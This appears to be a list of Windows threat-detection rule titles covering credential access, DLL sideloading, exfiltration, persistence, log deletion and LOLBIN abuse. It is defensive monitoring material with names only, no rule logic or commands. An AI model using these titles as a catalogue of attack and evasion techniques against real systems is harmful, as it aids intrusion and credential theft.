  • DNS Query To AzureWebsites.NET By Non-Browser Process
  • DNS Query To MEGA Hosting Website
  • DNS Query Request By Regsvr32.EXE
  • DNS Query To Remote Access Software Domain From Non-Browser App
  • Suspicious DNS Query for IP Lookup Service APIs
  • TeamViewer Domain Query By Non-TeamViewer Application
  • DNS Query To Visual Studio Code Tunnels Domain
  • PUA - System Informer Driver Load
  • Malicious Driver Load By Name
  • Credential Manager Access By Uncommon Applications
  • Access To Crypto Currency Wallets By Uncommon Applications
  • Access To Windows Credential History File By Uncommon Applications
  • Access To Windows DPAPI Master Keys By Uncommon Applications
  • Access To Potentially Sensitive Sysvol Files By Uncommon Applications
  • Microsoft Teams Sensitive File Access By Uncommon Applications
  • Backup Files Deleted
  • EventLog EVTX File Deleted
  • Process Deletion of Its Own Executable
  • IIS WebServer Access Logs Deleted
  • PowerShell Console History Logs Deleted
  • Tomcat WebServer Logs Deleted
  • File Deleted Via Sysinternals SDelete
  • ADS Zone.Identifier Deleted By Uncommon Application
  • ADSI-Cache File Creation By Uncommon Tool
  • Advanced IP Scanner - File Event
  • Anydesk Temporary Artefact
  • Assembly DLL Creation Via AspNetCompiler
  • EVTX Created In Uncommon Location
  • Creation Of Non-Existent System DLL
  • New Custom Shim Database Created
  • Suspicious Screensaver Binary File Creation
  • Files With System DLL Name In Unsuspected Locations
  • Files With System Process Name In Unsuspected Locations
  • CSExec Service File Creation
  • Potentially Suspicious DMP/HDMP File Creation
  • Potential Persistence Attempt Via ErrorHandler.Cmd
  • Suspicious File Drop by Exchange
  • GoToAssist Temporary Installation Artefact
  • Potential Initial Access via DLL Search Order Hijacking
  • Installation of TeamViewer Desktop
  • ISO or Image Mount Indicator in Recent Files
  • GatherNetworkInfo.VBS Reconnaissance Script Output
  • SCR File Write Event
  • Potential Persistence Via Notepad++ Plugins
  • Office Macro File Download
  • OneNote Attachment File Dropped In Suspicious Location
  • New Outlook Macro Created
  • Publisher Attachment File Dropped In Suspicious Location
  • Suspicious File Created In PerfLogs
  • Potential Binary Or Script Dropper Via PowerShell
  • PowerShell Module File Created By Non-PowerShell Process
  • Potential Suspicious PowerShell Module File Created
  • PSScriptPolicyTest Creation By Uncommon Process
  • Rclone Config File Creation
  • RemCom Service File Creation
  • ScreenConnect Temporary Installation Artefact
  • Self Extraction Directive File Created In Potentially Suspicious Location
  • Startup Folder File Write
  • Created Files by Microsoft Sync Center
  • Suspicious Files in Default GPO Folder
  • Suspicious desktop.ini Action
  • Creation of a Diagcab
  • Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream
  • Potential Homoglyph Attack Using Lookalike Characters in Filename
  • Suspicious LNK Double Extension File Created
  • Suspicious PFX File Creation
  • PowerShell Profile Modification
  • Suspicious PROCEXP152.sys File Created In TMP
  • Drop Binaries Into Spool Drivers Color Folder
  • TeamViewer Remote Session
  • VsCode Powershell Profile Modification
  • Windows Terminal Profile Settings Modification By Uncommon Process
  • WinSxS Executable File Creation By Non-System Process
  • LiveKD Driver Creation
  • Process Monitor Driver Creation By Non-Sysinternals Binary
  • Creation of WerFault.exe/Wer.dll in Unusual Folder
  • VHD Image Download Via Browser
  • Visual Studio Code Tunnel Remote File Creation
  • Potential Webshell Creation On Static Website
  • AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File
  • Writing Local Admin Share
  • Potentially Suspicious Self Extraction Directive File Created
  • Suspicious Appended Extension
  • Amsi.DLL Loaded Via LOLBIN Process
  • CredUI.DLL Loaded By Uncommon Process
  • PowerShell Core DLL Loaded By Non PowerShell Process
  • Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load
  • Unsigned Image Loaded Into LSASS Process
  • CLR DLL Loaded Via Office Applications
  • DotNET Assembly DLL Loaded Via Office Application
  • Active Directory Parsing DLL Loaded Via Office Application
  • Microsoft Excel Add-In Loaded From Uncommon Location
  • Active Directory Kerberos DLL Loaded Via Office Application
  • Microsoft VBA For Outlook Addin Loaded Via Outlook
  • PowerShell Core DLL Loaded Via Office Application
  • Remote DLL Load Via Rundll32.EXE
  • WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load
  • Potential Antivirus Software DLL Sideloading
  • Potential AVKkid.DLL Sideloading
  • Potential CCleanerDU.DLL Sideloading
  • Potential CCleanerReactivator.DLL Sideloading
  • Potential Chrome Frame Helper DLL Sideloading
  • Potential DLL Sideloading Via ClassicExplorer32.dll
  • Potential DLL Sideloading Using Coregen.exe
  • Potential DLL Sideloading Of DBGCORE.DLL
  • System Control Panel Item Loaded From Uncommon Location
  • Potential DLL Sideloading Of DBGHELP.DLL
  • Potential DLL Sideloading Of DbgModel.DLL
  • Potential Goopdate.DLL Sideloading
  • Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE
  • Potential DLL Sideloading Via JsSchHlp
  • Potential Libvlc.DLL Sideloading
  • Potential Mfdetours.DLL Sideloading
  • Potential DLL Sideloading Of MpSvc.DLL
  • Potential DLL Sideloading Of MsCorSvc.DLL
  • Potential Python DLL SideLoading
  • Potential RjvPlatform.DLL Sideloading From Default Location
  • Potential RoboForm.DLL Sideloading
  • Potential ShellDispatch.DLL Sideloading
  • Potential SolidPDFCreator.DLL Sideloading
  • Third Party Software DLL Sideloading
  • Potential Vivaldi_elf.DLL Sideloading
  • VMGuestLib DLL Sideload
  • VMMap Signed Dbghelp.DLL Potential Sideloading
  • Potential Wazuh Security Platform DLL Sideloading
  • Potential WWlib.DLL Sideloading
  • Unsigned Module Loaded by ClickOnce Application
  • DLL Load By System Process From Suspicious Locations
  • Python Image Load By Non-Python Process
  • Unsigned DLL Loaded by Windows Utility
  • WMIC Loading Scripting Libraries
  • Suspicious WSMAN Provider Image Loads
  • Uncommon Connection to Active Directory Web Services
  • Network Connection Initiated To AzureWebsites.NET By Non-Browser Process
  • Network Connection Initiated To BTunnels Domains
  • Network Connection Initiated To Cloudflared Tunnels Domains
  • Network Connection Initiated To DevTunnels Domain
  • Suspicious Network Connection to IP Lookup Service APIs
  • Suspicious Non-Browser Network Communication With Google API
  • Network Communication Initiated To Portmap.IO Domain
  • Suspicious Non-Browser Network Communication With Telegram API
  • Network Connection Initiated To Visual Studio Code Tunnels Domain
  • Office Application Initiated Network Connection To Non-Local IP
  • Office Application Initiated Network Connection Over Uncommon Ports
  • Python Initiated Connection
  • RegAsm.EXE Initiating Network Connection To Public IP
  • Remote Access Tool - AnyDesk Incoming Connection
  • Network Connection Initiated By Regsvr32.EXE
  • Microsoft Sync Center Suspicious Network Connections
  • Rundll32 Internet Connection
  • Uncommon Outbound Kerberos Connection
  • Communication To Uncommon Destination Ports
  • Outbound Network Connection To Public IP Via Winlogon
  • Suspicious Outbound SMTP Connections
  • ADFS Database Named Pipe Connection By Uncommon Tool
  • Suspicious Wordpad Outbound Connections
  • Potentially Suspicious Wuauclt Network Connection
  • Local Network Connection Initiated By Script Interpreter
  • Alternate PowerShell Hosts Pipe
  • PUA - CSExec Default Named Pipe
  • PUA - PAExec Default Named Pipe
  • PUA - RemCom Default Named Pipe
  • WMI Event Consumer Created Named Pipe
  • Nslookup PowerShell Download Cradle
  • PsExec Tool Execution From Suspicious Locations - PipeName
  • PowerShell Downgrade Attack - PowerShell
  • Netcat The Powershell Version
  • Suspicious PowerShell Download
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell
  • Suspicious Non PowerShell WSMAN COM Provider
  • Potential Active Directory Enumeration Using AD Module - PsModule
  • Alternate PowerShell Hosts - PowerShell Module
  • Clear PowerShell History - PowerShell Module
  • PowerShell Get Clipboard
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module
  • Suspicious PowerShell Download - PoshModule
  • Suspicious Computer Machine Password by PowerShell
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell Module
  • SyncAppvPublishingServer Bypass Powershell Restriction - PS Module
  • Access to Browser Login Data
  • Potential Active Directory Enumeration Using AD Module - PsScript
  • Add Windows Capability Via PowerShell Script
  • Potential AMSI Bypass Script Using NULL Bits
  • Get-ADUser Enumeration Using UserAccountControl Flags
  • Potential Data Exfiltration Via Audio File
  • Automated Collection Command PowerShell
  • Windows Screen Capture with CopyFromScreen
  • Clear PowerShell History - PowerShell
  • Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell
  • Powershell Create Scheduled Task
  • Registry-Free Process Scope COR_PROFILER
  • PowerShell Create Local User
  • Powershell Detect Virtualization Environment
  • DirectorySearcher Powershell Exploitation
  • Manipulation of User Computer or Group Security Principals Across AD
  • Potential In-Memory Execution Using Reflection.Assembly
  • Potential COM Objects Download Cradles Usage - PS Script
  • Dump Credentials from Windows Credential Manager With PowerShell
  • Enable Windows Remote Management
  • Potential Suspicious Windows Feature Enabled
  • Enumerate Credentials from Windows Credential Manager With PowerShell
  • Suspicious PowerShell Mailbox SMTP Forward Rule
  • Certificate Exported Via PowerShell - ScriptBlock
  • Suspicious FromBase64String Usage On Gzip Archive - Ps Script
  • Service Registry Permissions Weakness Check
  • Suspicious Get-ADReplAccount
  • Security Software Discovery Via Powershell Script
  • PowerShell Hotfix Enumeration
  • PowerShell ICMP Exfiltration
  • Import PowerShell Modules From Suspicious Directories
  • Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript
  • Execute Invoke-command on Remote Host
  • Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell
  • Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell
  • Powershell Keylogging
  • Powershell LocalAccount Manipulation
  • Malicious PowerShell Keywords
  • Modify Group Policy Settings - ScriptBlockLogging
  • Powershell MsXml COM Object
  • Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock
  • PowerShell Remote Session Creation
  • PowerShell Script With File Hostname Resolving Capabilities
  • Root Certificate Installed - PowerShell
  • Suspicious Invoke-Item From Mount-DiskImage
  • Powershell Sensitive File Discovery
  • Change PowerShell Policies to an Insecure Level - PowerShell
  • Detected Windows Software Discovery - PowerShell
  • Powershell Store File In Alternate Data Stream
  • Suspicious Eventlog Clear
  • Powershell Directory Enumeration
  • Suspicious PowerShell Download - Powershell Script
  • Powershell Execute Batch Script
  • Troubleshooting Pack Cmdlet Execution
  • Extracting Information with PowerShell
  • Suspicious GetTypeFromCLSID ShellExecute
  • Suspicious Hyper-V Cmdlets
  • Suspicious IO.FileStream
  • Change User Agents with WebRequest
  • Potential Keylogger Activity
  • Potential Suspicious PowerShell Keywords
  • Powershell Local Email Collection
  • PowerShell Deleted Mounted Share
  • Suspicious New-PSDrive to Admin Share
  • Suspicious TCP Tunnel Via PowerShell Script
  • Recon Information for Export with PowerShell
  • Remove Account From Domain Admin Group
  • Suspicious Start-Process PassThru
  • Suspicious Unblock-File
  • Suspicious PowerShell WindowStyle Option
  • PowerShell Write-EventLog Usage
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell Script
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction
  • Testing Usage of Uncommonly Used Port
  • Powershell Timestomp
  • User Discovery And Export Via Get-ADUser Cmdlet - PowerShell
  • Potential Persistence Via PowerShell User Profile Using Add-Content
  • Usage Of Web Request Commands And Cmdlets - ScriptBlock
  • Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript
  • PowerShell WMI Win32_Product Install MSI
  • Windows Firewall Profile Disabled
  • Winlogon Helper DLL
  • Windows Defender Exclusions Added - PowerShell
  • Powershell WMI Persistence
  • WMIC Unquoted Services Path Lookup - PowerShell
  • Suspicious X509Enrollment - Ps Script
  • Powershell XML Execute Command
  • Potential Credential Dumping Activity Via LSASS
  • Potentially Suspicious GrantedAccess Flags On LSASS
  • Potential Direct Syscall of NtOpenProcess
  • Function Call From Undocumented COM Interface EditionUpgradeManager
  • Compress Data and Lock With Password for Exfiltration With 7-ZIP
  • 7Zip Compressing Dump Files
  • Potential DLL Injection Via AccCheckConsole
  • Uncommon Child Process Of AddinUtil.EXE
  • Uncommon AddinUtil.EXE CommandLine Execution
  • AddinUtil.EXE Execution From Uncommon Directory
  • AgentExecutor PowerShell Execution
  • Uncommon Child Process Of Appvlp.EXE
  • AspNetCompiler Execution
  • Uncommon Assistive Technology Applications Execution Via AtBroker.EXE
  • Hiding Files with Attrib.exe
  • Indirect Inline Command Execution Via Bash.EXE
  • Indirect Command Execution From Script File Via Bash.EXE
  • Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE
  • Data Export From MSSQL Table Via BCP.EXE
  • Uncommon Child Process Of BgInfo.EXE
  • File Download Via Bitsadmin
  • File Download Via Bitsadmin To An Uncommon Target Folder
  • Monitoring For Persistence Via BITS
  • Browser Execution In Headless Mode
  • Chromium Browser Instance Executed With Custom Extension
  • File Download From Browser Process Via Inline URL
  • Browser Started with Remote Debugging
  • Potential Binary Proxy Execution Via Cdb.EXE
  • New Root Certificate Installed Via CertMgr.EXE
  • File Download via CertOC.EXE
  • DLL Loaded via CertOC.EXE
  • New Root Certificate Installed Via Certutil.EXE
  • File Decoded From Base64/Hex Via Certutil.EXE
  • Suspicious Download Via Certutil.EXE
  • File Encoded To Base64 Via Certutil.EXE
  • Certificate Exported Via Certutil.EXE
  • Suspicious CodePage Switch Via CHCP
  • Console CodePage Lookup Via CHCP
  • Deleted Data Overwritten Via Cipher.EXE
  • Cloudflared Portable Execution
  • Cloudflared Quick Tunnel Execution
  • Cloudflared Tunnel Connections Cleanup
  • Cloudflared Tunnel Execution
  • New Generic Credentials Added Via Cmdkey.EXE
  • Potential Arbitrary File Download Via Cmdl32.EXE
  • Greedy File Deletion Using Del
  • Potential Dosfuscation Activity
  • Command Line Execution with Suspicious URL and AppData Strings
  • Potentially Suspicious Ping/Copy Command Combination
  • Potentially Suspicious CMD Shell Output Redirect
  • Read Contents From Stdin Via Cmd.EXE
  • Potential Download/Upload Activity Using Type Command
  • Unusual Parent Process For Cmd.EXE
  • Arbitrary File Download Via ConfigSecurityPolicy.EXE
  • Powershell Executed From Headless ConHost Process
  • Uncommon Child Process Of Conhost.EXE
  • Conhost Spawned By Uncommon Parent Process
  • Dynamic .NET Compilation Via Csc.EXE
  • Suspicious Csi.exe Usage
  • Active Directory Structure Export Via Csvde.EXE
  • Potential Cookies Session Hijacking
  • Curl Web Request With Potential Custom User-Agent
  • File Download From IP URL Via Curl.EXE
  • Insecure Transfer Via Curl.EXE
  • Insecure Proxy/DOH Transfer Via Curl.EXE
  • Local File Read Using Curl.EXE
  • Uncommon Child Process Of Defaultpack.EXE
  • Remote File Download Via Desktopimgdownldr Utility
  • Potential DLL Sideloading Via DeviceEnroller.EXE
  • Potentially Suspicious Child Process Of ClickOnce Application
  • Arbitrary MSI Download Via Devinit.EXE
  • Potentially Suspicious Child Process Of DiskShadow.EXE
  • Diskshadow Script Mode - Uncommon Script Extension Execution
  • Diskshadow Script Mode - Execution From Potential Suspicious Location
  • Dism Remove Online Package
  • Potential Discovery Activity Via Dnscmd.EXE
  • Potential Application Whitelisting Bypass via Dnx.EXE
  • Process Memory Dump Via Dotnet-Dump
  • Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE
  • Binary Proxy Execution Via Dotnet-Trace.EXE
  • DriverQuery.EXE Execution
  • Potentially Over Permissive Permissions Granted Using Dsacls.EXE
  • Potential Password Spraying Attempt Using Dsacls.EXE
  • Domain Trust Discovery Via Dsquery
  • DumpMinitool Execution
  • New Capture Session Launched Via DXCap.EXE
  • Esentutl Gather Credentials
  • Esentutl Steals Browser Information
  • Potentially Suspicious Cabinet File Expansion
  • Explorer Process Tree Break
  • Remote File Download Via Findstr.EXE
  • Findstr Launching .lnk File
  • Recon Command Output Piped To Findstr.EXE
  • Permission Misconfiguration Reconnaissance Via Findstr.EXE
  • Security Tools Keyword Lookup Via Findstr.EXE
  • Filter Driver Unloaded Via Fltmc.EXE
  • Forfiles Command Execution
  • Use of FSharp Interpreters
  • Fsutil Behavior Set SymlinkEvaluation
  • Potential Arbitrary Command Execution Via FTP.EXE
  • Arbitrary File Download Via GfxDownloadWrapper.EXE
  • Suspicious Git Clone
  • File Decryption Using Gpg4win
  • File Encryption Using Gpg4win
  • Portable Gpg.EXE Execution
  • Arbitrary Binary Execution Using GUP Utility
  • Gpresult Display Group Policy Information
  • HackTool - WinRM Access Via Evil-WinRM
  • HackTool - Impersonate Execution
  • Invoke-Obfuscation COMPRESS OBFUSCATION
  • HackTool - Jlaive In-Memory Assembly Execution
  • HackTool - LaZagne Execution
  • HackTool - SharpLDAPmonitor Execution
  • Suspicious ZipExec Execution
  • Potential Fake Instance Of Hxtsr.EXE Executed
  • Use Icacls to Hide File to Everyone
  • IIS Native-Code Module Command Line Installation
  • Suspicious IIS URL GlobalRules Rewrite Via AppCmd
  • C# IL Code Compilation Via Ilasm.EXE
  • InfDefaultInstall.exe .inf Execution
  • File Download Via InstallUtil.EXE
  • Suspicious Execution of InstallUtil Without Log
  • Java Running with Remote Debugging
  • Shell Process Spawned by Java.EXE
  • Suspicious SysAidServer Child
  • Windows Kernel Debugger Execution
  • Computer Password Change Via Ksetup.EXE
  • Potentially Suspicious Child Process of KeyScrambler.exe
  • Active Directory Structure Export Via Ldifde.EXE
  • Logged-On User Password Change Via Ksetup.EXE
  • Import LDAP Data Interchange Format File Via Ldifde.EXE
  • Uncommon Link.EXE Parent Process
  • Rebuild Performance Counter Values Via Lodctr.EXE
  • Suspicious CustomShellHost Execution
  • LOLBAS Data Exfiltration by DataSvcUtil.exe
  • DeviceCredentialDeployment Execution
  • Suspicious Diantz Alternate Data Stream Execution
  • Suspicious Diantz Download and Compress Into a CAB File
  • Suspicious Extrac32 Execution
  • Suspicious Extrac32 Alternate Data Stream Execution
  • Potential Reconnaissance Activity Via GatherNetworkInfo.VBS
  • Gpscript Execution
  • Ie4uinit Lolbin Use From Invalid Path
  • Launch-VsDevShell.PS1 Proxy Execution
  • Execute Files with Msdeploy.exe
  • Use of OpenConsole
  • Use of Pcalua For Execution
  • Code Execution via Pcwutl.dll
  • Execute Code with Pester.bat as Parent
  • Execute Code with Pester.bat
  • Pubprn.vbs Proxy Execution
  • DLL Execution via Rasautou.exe
  • REGISTER_APP.VBS Proxy Execution
  • Use of Remote.exe
  • Replace.exe Usage
  • Lolbin Runexehelper Use As Proxy
  • Suspicious Runscripthelper.exe
  • Use of Scriptrunner.exe
  • Use Of The SFTP.EXE Binary As A LOLBIN
  • Suspicious Driver Install by pnputil.exe
  • Dumping Process via Sqldumper.exe
  • SyncAppvPublishingServer Execute Arbitrary PowerShell Code
  • SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code
  • Potential DLL Injection Or Execution Using Tracker.exe
  • Use of TTDInject.exe
  • Lolbin Unregmp2.exe Use As Proxy
  • UtilityFunctions.ps1 Proxy Dll
  • Use of VisualUiaVerifyNative.exe
  • Use of VSIISExeLauncher.exe
  • Use of Wfc.exe
  • Potential Register_App.Vbs LOLScript Abuse
  • Potential Mftrace.EXE Abuse
  • CodePage Modification Via MODE.COM To Russian Language
  • Suspicious Msbuild Execution By Uncommon Parent Process
  • Suspicious Cabinet File Execution Via Msdt.EXE
  • Arbitrary File Download Via MSEDGE_PROXY.EXE
  • Wscript Shell Run In CommandLine
  • DllUnregisterServer Function Call Via Msiexec.EXE
  • Suspicious MsiExec Embedding Parent
  • Suspicious Msiexec Execute Arbitrary DLL
  • Msiexec Quiet Installation
  • Suspicious Msiexec Quiet Install From Remote Location
  • MsiExec Web Install
  • Arbitrary File Download Via MSOHTMED.EXE
  • Arbitrary File Download Via MSPUB.EXE
  • Detection of PowerShell Execution via Sqlps.exe
  • SQL Client Tools PowerShell Session Detection
  • New Remote Desktop Connection Initiated Via Mstsc.EXE
  • Msxsl.EXE Execution
  • New Firewall Rule Added Via Netsh.EXE
  • Firewall Rule Deleted Via Netsh.EXE
  • Firewall Disabled via Netsh.EXE
  • Netsh Allow Group Policy on Microsoft Defender Firewall
  • Firewall Rule Update Via Netsh.EXE
  • Potential Persistence Via Netsh Helper DLL
  • New Network Trace Capture Started Via Netsh.EXE
  • New Port Forwarding Rule Added Via Netsh.EXE
  • Harvesting Of Wifi Credentials Via Netsh.EXE
  • Suspicious Group And Account Reconnaissance Activity Using Net.EXE
  • New User Created Via Net.EXE
  • Windows Admin Share Mount Via Net.EXE
  • Password Provided In Command Line Of Net.EXE
  • Potential Recon Activity Via Nltest.EXE
  • Node Process Executions
  • Nslookup PowerShell Download Cradle - ProcessCreation
  • Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)
  • Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)
  • Driver/DLL Installation Via Odbcconf.EXE
  • New DLL Registered Via Odbcconf.EXE
  • Response File Execution Via Odbcconf.EXE
  • Uncommon Child Process Spawned By Odbcconf.EXE
  • Potential Arbitrary DLL Load Using Winword
  • Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution
  • PDQ Deploy Remote Adminstartion Tool Execution
  • Potentially Suspicious Execution Of PDQDeployRunner
  • Perl Inline Command Execution
  • Php Inline Command Execution
  • PktMon.EXE Execution
  • Suspicious Powercfg Execution To Change Lock Screen Timeout
  • Potential Active Directory Enumeration Using AD Module - ProcCreation
  • Add Windows Capability Via PowerShell Cmdlet
  • Potential AMSI Bypass Using NULL Bits
  • Audio Capture via PowerShell
  • Potential Process Execution Proxy Via CL_Invocation.ps1
  • Assembly Loading Via CL_LoadAssembly.ps1
  • Potential Script Proxy Execution Via CL_Mutexverifiers.ps1
  • ConvertTo-SecureString Cmdlet Usage Via CommandLine
  • Computer Discovery And Export Via Get-ADComputer Cmdlet
  • Gzip Archive Decode Via PowerShell
  • Powershell Defender Exclusion
  • Windows Firewall Disabled via PowerShell
  • Potential PowerShell Downgrade Attack
  • Potential COM Objects Download Cradles Usage - Process Creation
  • PowerShell Web Download
  • Potential DLL File Download Via PowerShell Invoke-WebRequest
  • PowerShell Download Pattern
  • Potential Suspicious Windows Feature Enabled - ProcCreation
  • Suspicious Execution of Powershell with Base64
  • Powershell Inline Execution From A File
  • Certificate Exported Via PowerShell
  • Suspicious FromBase64String Usage On Gzip Archive - Process Creation
  • Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet
  • PowerShell Get-Clipboard Cmdlet Via CLI
  • Import PowerShell Modules From Suspicious Directories - ProcCreation
  • Unsigned AppX Installation Attempt Using Add-AppxPackage
  • Suspicious PowerShell Invocations - Specific - ProcessCreation
  • Suspicious Invoke-WebRequest Execution With DirectIP
  • MSExchange Transport Agent Installation
  • Suspicious PowerShell Invocation From Script Engines
  • Change PowerShell Policies to an Insecure Level
  • Service StartupType Change Via PowerShell Set-Service
  • PowerShell Script Run in AppData
  • User Discovery And Export Via Get-ADUser Cmdlet
  • Suspicious X509Enrollment - Process Creation
  • Suspicious XOR Encoded PowerShell Command
  • Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
  • Arbitrary File Download Via PresentationHost.EXE
  • XBAP Execution From Uncommon Locations Via PresentationHost.EXE
  • Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution
  • Abusing Print Executable
  • File Download Using ProtocolHandler.exe
  • Potential Provlaunch.EXE Binary Proxy Execution Abuse
  • Screen Capture Activity Via Psr.EXE
  • PUA - AdvancedRun Execution
  • PUA - Advanced IP Scanner Execution
  • PUA - Advanced Port Scanner Execution
  • PUA - Mouse Lock Execution
  • PUA - SoftPerfect Netscan Execution
  • PUA - NirCmd Execution
  • PUA - Nmap/Zenmap Execution
  • PUA - PingCastle Execution
  • PUA - Process Hacker Execution
  • PUA - Radmin Viewer Utility Execution
  • PUA - Potential PE Metadata Tamper Using Rcedit
  • PUA - System Informer Execution
  • PUA - WebBrowserPassView Execution
  • Python Inline Command Execution
  • Potentially Suspicious Usage Of Qemu
  • Query Usage To Exfil Data
  • Suspicious RASdial Activity
  • Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension
  • Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
  • Imports Registry Key From a File
  • DLL Execution Via Register-cimprovider.exe
  • Enumeration for 3rd Party Creds From CLI
  • Hiding User Account Via SpecialAccounts Registry Key - CommandLine
  • Persistence Via TypedPaths - CommandLine
  • Potential Regsvr32 Commandline Flag Anomaly
  • Potentially Suspicious Regsvr32 HTTP/FTP Pattern
  • Regsvr32 Execution From Potential Suspicious Location
  • Scripting/CommandLine Process Spawned Regsvr32
  • Regsvr32 DLL Execution With Uncommon Extension
  • Potential Persistence Attempt Via Run Keys Using Reg.EXE
  • Dropping Of Password Filter DLL
  • Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
  • Potentially Suspicious Desktop Background Change Using Reg.EXE
  • Direct Autorun Keys Modification
  • Windows Recall Feature Enabled Via Reg.EXE
  • Potential Suspicious Registry File Imported Via Reg.EXE
  • Modify Group Policy Settings
  • Suspicious Reg Add Open Command
  • Enumeration for Credentials in Registry
  • Detected Windows Software Discovery
  • Potential Configuration And Service Reconnaissance Via Reg.EXE
  • Suspicious ScreenSave Change by Reg.exe
  • Changing Existing Service ImagePath Value Via Reg.EXE
  • Write Protect For Storage Disabled
  • Remote Access Tool - AnyDesk Execution
  • Remote Access Tool - AnyDesk Piped Password Via CLI
  • Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate
  • Remote Access Tool - RURAT Execution From Unusual Location
  • Remote Access Tool - MeshAgent Command Execution via MeshCentral
  • Remote Access Tool - NetSupport Execution
  • Remote Access Tool - NetSupport Execution From Unusual Location
  • Remote Access Tool - GoToAssist Execution
  • Remote Access Tool - LogMeIn Execution
  • Remote Access Tool - ScreenConnect Execution
  • Remote Access Tool - ScreenConnect Installation Execution
  • Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution
  • Remote Access Tool - Simple Help Execution
  • Remote Access Tool - UltraViewer Execution
  • Renamed AutoHotkey.EXE Execution
  • Potential Defense Evasion Via Binary Rename
  • Renamed BOINC Client Execution
  • Renamed CURL.EXE Execution
  • Renamed FTP.EXE Execution
  • Renamed Microsoft Teams Execution
  • Visual Studio NodejsTools PressAnyKey Renamed Execution
  • Renamed Remote Utilities RAT (RURAT) Execution
  • Capture Credentials with Rpcping.exe
  • Ruby Inline Command Execution
  • Rundll32 InstallScreenSaver Execution
  • Potential Obfuscated Ordinal Call Via Rundll32
  • Rundll32 Spawned Via Explorer.EXE
  • Suspicious Process Start Locations
  • Suspicious Rundll32 Setupapi.dll Activity
  • Potential ShellDispatch.DLL Functionality Abuse
  • Potentially Suspicious Rundll32 Activity
  • Potentially Suspicious Rundll32.EXE Execution of UDL File
  • Rundll32 Execution With Uncommon DLL Extension
  • Suspicious Workstation Locking via Rundll32
  • WebDav Client Execution Via Rundll32.EXE
  • Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
  • Suspicious Scheduled Task Name As GUID
  • Potential Persistence Via Microsoft Compatibility Appraiser
  • Scheduled Task Executing Payload from Registry
  • Suspicious Schtasks Schedule Type With High Privileges
  • Suspicious Scheduled Task Creation via Masqueraded XML File
  • Service StartupType Change Via Sc.EXE
  • New Kernel Driver Via SC.EXE
  • Service Security Descriptor Tampering Via Sc.EXE
  • Potential Persistence Attempt Via Existing Service Tampering
  • Potential Shim Database Persistence via Sdbinst.EXE
  • Uncommon Extension Shim Database Installation Via Sdbinst.EXE
  • Sdclt Child Processes
  • Potential Suspicious Activity Using SeCEdit
  • Potential SPN Enumeration Via Setspn.EXE
  • Setup16.EXE Execution With Custom .Lst File
  • Suspicious Execution of Shutdown
  • Suspicious Execution of Shutdown to Log Out
  • Uncommon Sigverif.EXE Child Process
  • Uncommon Child Processes Of SndVol.exe
  • Audio Capture via SoundRecorder
  • Veeam Backup Database Suspicious Query
  • Arbitrary File Download Via Squirrel.EXE
  • Process Proxy Execution Via Squirrel.EXE
  • Port Forwarding Activity Via SSH.EXE
  • Program Executed Using Proxy/Local Command Via SSH.EXE
  • Potential Amazon SSM Agent Hijacking
  • Start of NT Virtual DOS Machine
  • User Added to Local Administrators Group
  • Execute From Alternate Data Streams
  • Always Install Elevated Windows Installer
  • Potentially Suspicious Windows App Activity
  • Arbitrary Shell Command Execution Via Settingcontent-Ms
  • Automated Collection Command Prompt
  • Potential Suspicious Browser Launch From Document Reader Process
  • Potential Browser Data Stealing
  • Potential Commandline Obfuscation Using Escape Characters
  • Potential Command Line Path Traversal Evasion Attempt
  • Suspicious Copy From or To System Directory
  • Copy From Or To Admin Share Or Sysvol Folder
  • Always Install Elevated MSI Spawned Cmd And Powershell
  • Suspicious Electron Application Child Processes
  • Potentially Suspicious Electron Application CommandLine
  • Elevated System Shell Spawned From Uncommon Parent Location
  • Hidden Powershell in Link File Pattern
  • Potentially Suspicious EventLog Recon Activity Using Log Query Utilities
  • Suspicious File Characteristics Due to Missing Fields
  • Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI
  • Writing Of Malicious Files To The Fonts Folder
  • Potential Homoglyph Attack Using Lookalike Characters
  • Potentially Suspicious JWT Token Search Via CLI
  • LOLBIN Execution From Abnormal Drive
  • Potential File Download Via MS-AppInstaller Protocol Handler
  • Suspicious Scan Loop Network
  • Potential Network Sniffing Activity Using Network Tools
  • Execution of Suspicious File Type Extension
  • Process Launched Without Image Name
  • Use Short Name Path in Command Line
  • Use Short Name Path in Image
  • Use NTFS Short Name in Command Line
  • Use NTFS Short Name in Image
  • Obfuscated IP Download Activity
  • Obfuscated IP Via CLI
  • Private Keys Reconnaissance Via CommandLine Tools
  • Suspicious RunAs-Like Flag Combination
  • Recon Information for Export with Command Prompt
  • Potential Remote Desktop Tunneling
  • Shadow Copies Creation Using Operating Systems Utilities
  • Suspicious SYSVOL Domain Group Policy Access
  • Process Creation Using Sysnative Folder
